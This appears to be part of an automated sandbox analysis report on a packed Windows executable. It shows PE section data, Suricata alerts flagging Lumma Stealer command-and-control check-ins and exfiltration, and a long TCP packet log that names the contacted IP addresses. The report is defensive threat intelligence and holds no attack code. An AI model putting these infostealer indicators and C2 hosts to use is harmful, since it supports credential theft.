	0x1000	0x51000	0x24800	e72b04d526f252ab7fe8ae5897cd5f8d	False	0.9973646190068494	data	7.980998482976636	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x52000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x53000	0x1000	0x200	19a29171433eeef17e42fd663f137134	False	0.14453125	data	0.9996515881509258	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nwoikvrs	0x54000	0x296000	0x296000	22b13541f08fd6b1eece51ca9b3d6d0e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xechgvpa	0x2ea000	0x1000	0x400	efaae6b73be845c84c948783edfe43b5	False	0.7353515625	data	5.899392370547605	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x2eb000	0x3000	0x2200	8e06114e8e20ba0f5c1feff7fd6c90df	False	0.05939797794117647	DOS executable (COM)	0.7172253289304904	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-23T17:30:00.902825+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	172.67.199.72	443	TCP
2024-12-23T17:30:01.531143+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	172.67.199.72	443	TCP
2024-12-23T17:30:01.531143+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	172.67.199.72	443	TCP
2024-12-23T17:30:03.076475+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	172.67.199.72	443	TCP
2024-12-23T17:30:03.862185+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	172.67.199.72	443	TCP
2024-12-23T17:30:03.862185+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	172.67.199.72	443	TCP
2024-12-23T17:30:05.452607+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	172.67.199.72	443	TCP
2024-12-23T17:30:08.267298+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	172.67.199.72	443	TCP
2024-12-23T17:30:11.137063+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	172.67.199.72	443	TCP
2024-12-23T17:30:13.917098+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	172.67.199.72	443	TCP
2024-12-23T17:30:14.696136+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49735	172.67.199.72	443	TCP
2024-12-23T17:30:16.434393+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	172.67.199.72	443	TCP
2024-12-23T17:30:22.266344+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	172.67.199.72	443	TCP
2024-12-23T17:30:23.077616+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49741	172.67.199.72	443	TCP
2024-12-23T17:30:24.917502+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	185.166.143.50	443	TCP
2024-12-23T17:30:27.347005+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	3.5.27.149	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 17:29:59.675278902 CET	49730	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:29:59.675308943 CET	443	49730	172.67.199.72	192.168.2.4
Dec 23, 2024 17:29:59.675393105 CET	49730	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:29:59.678112030 CET	49730	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:29:59.678127050 CET	443	49730	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:00.902746916 CET	443	49730	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:00.902825117 CET	49730	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:00.906943083 CET	49730	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:00.906958103 CET	443	49730	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:00.907248020 CET	443	49730	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:00.956609964 CET	49730	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:00.956609964 CET	49730	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:00.956768036 CET	443	49730	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:01.531189919 CET	443	49730	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:01.531459093 CET	443	49730	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:01.531538010 CET	49730	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:01.533337116 CET	49730	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:01.533354044 CET	443	49730	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:01.542073011 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:01.542175055 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:01.542356968 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:01.542937994 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:01.542974949 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.076396942 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.076474905 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:03.093802929 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:03.093832016 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.094189882 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.095526934 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:03.095568895 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:03.095613003 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.862186909 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.862251043 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.862282038 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.862317085 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.862341881 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:03.862354994 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.862368107 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.862384081 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:03.862409115 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:03.862423897 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.870982885 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.871045113 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:03.871063948 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.878773928 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.878849983 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:03.878868103 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.931344986 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:03.931370974 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:03.978210926 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:03.981868029 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:04.025113106 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:04.054225922 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:04.058209896 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:04.058285952 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:04.058324099 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:04.058473110 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:04.058537960 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:04.058593988 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:04.058609962 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:04.058625937 CET	49731	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:04.058631897 CET	443	49731	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:04.236411095 CET	49732	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:04.236449003 CET	443	49732	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:04.236520052 CET	49732	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:04.236829996 CET	49732	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:04.236845016 CET	443	49732	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:05.452513933 CET	443	49732	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:05.452606916 CET	49732	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:05.453996897 CET	49732	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:05.454006910 CET	443	49732	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:05.454250097 CET	443	49732	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:05.455583096 CET	49732	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:05.455739975 CET	49732	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:05.455777884 CET	443	49732	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:05.455833912 CET	49732	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:05.455843925 CET	443	49732	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:06.906009912 CET	443	49732	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:06.906120062 CET	443	49732	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:06.906187057 CET	49732	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:06.906367064 CET	49732	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:06.906382084 CET	443	49732	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:07.036493063 CET	49733	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:07.036554098 CET	443	49733	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:07.036642075 CET	49733	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:07.036971092 CET	49733	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:07.036987066 CET	443	49733	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:08.267167091 CET	443	49733	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:08.267297983 CET	49733	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:08.269171000 CET	49733	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:08.269186974 CET	443	49733	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:08.269453049 CET	443	49733	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:08.270973921 CET	49733	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:08.271173000 CET	49733	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:08.271193981 CET	443	49733	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:09.563604116 CET	443	49733	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:09.563692093 CET	443	49733	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:09.563762903 CET	49733	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:09.564013958 CET	49733	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:09.564030886 CET	443	49733	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:09.918175936 CET	49734	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:09.918219090 CET	443	49734	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:09.918291092 CET	49734	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:09.919039965 CET	49734	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:09.919054031 CET	443	49734	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:11.136899948 CET	443	49734	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:11.137063026 CET	49734	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:11.139023066 CET	49734	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:11.139031887 CET	443	49734	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:11.139291048 CET	443	49734	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:11.140911102 CET	49734	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:11.140969992 CET	49734	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:11.140986919 CET	443	49734	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:11.141050100 CET	49734	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:11.141057014 CET	443	49734	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:12.179642916 CET	443	49734	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:12.179733992 CET	443	49734	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:12.179831028 CET	49734	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:12.179958105 CET	49734	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:12.179972887 CET	443	49734	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:12.697309971 CET	49735	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:12.697372913 CET	443	49735	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:12.697462082 CET	49735	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:12.697762012 CET	49735	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:12.697777033 CET	443	49735	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:13.917012930 CET	443	49735	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:13.917098045 CET	49735	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:13.918348074 CET	49735	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:13.918358088 CET	443	49735	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:13.918766022 CET	443	49735	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:13.920047045 CET	49735	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:13.920167923 CET	49735	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:13.920172930 CET	443	49735	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:14.696151018 CET	443	49735	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:14.696269989 CET	443	49735	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:14.696345091 CET	49735	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:14.696451902 CET	49735	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:14.696470022 CET	443	49735	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:15.195036888 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:15.195084095 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:15.195297956 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:15.195557117 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:15.195569038 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.433718920 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.434392929 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.435338974 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.435354948 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.435683966 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.478351116 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.491413116 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.492273092 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.492311954 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.492568016 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.492598057 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.492804050 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.492834091 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.493398905 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.493419886 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.493550062 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.493578911 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.493702888 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.493721008 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.493731022 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.493762016 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.493870020 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.493890047 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.493906975 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.494007111 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.494029045 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.535325050 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.535509109 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.535540104 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.535568953 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.535582066 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:16.535629988 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:16.535665035 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:20.762715101 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:20.762820005 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:20.762908936 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:20.763139009 CET	49736	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:20.763159037 CET	443	49736	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:20.786717892 CET	49741	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:20.786792994 CET	443	49741	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:20.786916018 CET	49741	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:20.787249088 CET	49741	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:20.787261009 CET	443	49741	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:22.266212940 CET	443	49741	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:22.266344070 CET	49741	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:22.269651890 CET	49741	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:22.269660950 CET	443	49741	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:22.269954920 CET	443	49741	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:22.276899099 CET	49741	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:22.276947021 CET	49741	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:22.276995897 CET	443	49741	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:23.077703953 CET	443	49741	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:23.078047037 CET	443	49741	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:23.078226089 CET	49741	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:23.078434944 CET	49741	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:23.078457117 CET	443	49741	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:23.078502893 CET	49741	443	192.168.2.4	172.67.199.72
Dec 23, 2024 17:30:23.078510046 CET	443	49741	172.67.199.72	192.168.2.4
Dec 23, 2024 17:30:23.311615944 CET	49743	443	192.168.2.4	185.166.143.50
Dec 23, 2024 17:30:23.311665058 CET	443	49743	185.166.143.50	192.168.2.4
Dec 23, 2024 17:30:23.311728954 CET	49743	443	192.168.2.4	185.166.143.50
Dec 23, 2024 17:30:23.312108994 CET	49743	443	192.168.2.4	185.166.143.50
Dec 23, 2024 17:30:23.312138081 CET	443	49743	185.166.143.50	192.168.2.4
Dec 23, 2024 17:30:24.917418003 CET	443	49743	185.166.143.50	192.168.2.4
Dec 23, 2024 17:30:24.917501926 CET	49743	443	192.168.2.4	185.166.143.50
Dec 23, 2024 17:30:24.921291113 CET	49743	443	192.168.2.4	185.166.143.50
Dec 23, 2024 17:30:24.921303988 CET	443	49743	185.166.143.50	192.168.2.4
Dec 23, 2024 17:30:24.921556950 CET	443	49743	185.166.143.50	192.168.2.4
Dec 23, 2024 17:30:24.929780960 CET	49743	443	192.168.2.4	185.166.143.50
Dec 23, 2024 17:30:24.975336075 CET	443	49743	185.166.143.50	192.168.2.4
Dec 23, 2024 17:30:25.623810053 CET	443	49743	185.166.143.50	192.168.2.4
Dec 23, 2024 17:30:25.623850107 CET	443	49743	185.166.143.50	192.168.2.4
Dec 23, 2024 17:30:25.623893023 CET	443	49743	185.166.143.50	192.168.2.4
Dec 23, 2024 17:30:25.623938084 CET	49743	443	192.168.2.4	185.166.143.50
Dec 23, 2024 17:30:25.623986959 CET	49743	443	192.168.2.4	185.166.143.50
Dec 23, 2024 17:30:25.624207973 CET	49743	443	192.168.2.4	185.166.143.50
Dec 23, 2024 17:30:25.624228954 CET	443	49743	185.166.143.50	192.168.2.4
Dec 23, 2024 17:30:25.624242067 CET	49743	443	192.168.2.4	185.166.143.50
Dec 23, 2024 17:30:25.624247074 CET	443	49743	185.166.143.50	192.168.2.4
Dec 23, 2024 17:30:25.922056913 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:25.922099113 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:25.922199011 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:25.922626019 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:25.922641039 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:27.346896887 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:27.347004890 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:27.350900888 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:27.350910902 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:27.351238012 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:27.361181021 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:27.407339096 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:27.840955973 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:27.884551048 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:27.891307116 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:27.891329050 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:27.891405106 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:27.891428947 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:27.891458035 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:27.891486883 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:27.891491890 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:27.891496897 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:27.891604900 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:27.891604900 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:27.891604900 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.068175077 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.068207979 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.068391085 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.068418980 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.068466902 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.075942993 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.119010925 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.122821093 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.122853041 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.123121977 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.123137951 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.123265982 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.130588055 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.130754948 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.130857944 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.130877972 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.181457996 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.247848034 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.247868061 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.247919083 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.247951031 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.248059988 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.248059988 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.248106003 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.251306057 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.254174948 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.294192076 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.294212103 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.294338942 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.294338942 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.294367075 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.331950903 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.331979990 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.332036018 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.332027912 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.332070112 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.332112074 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.332112074 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.416599989 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.437108040 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.437129021 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.437149048 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.437159061 CET	443	49745	3.5.27.149	192.168.2.4
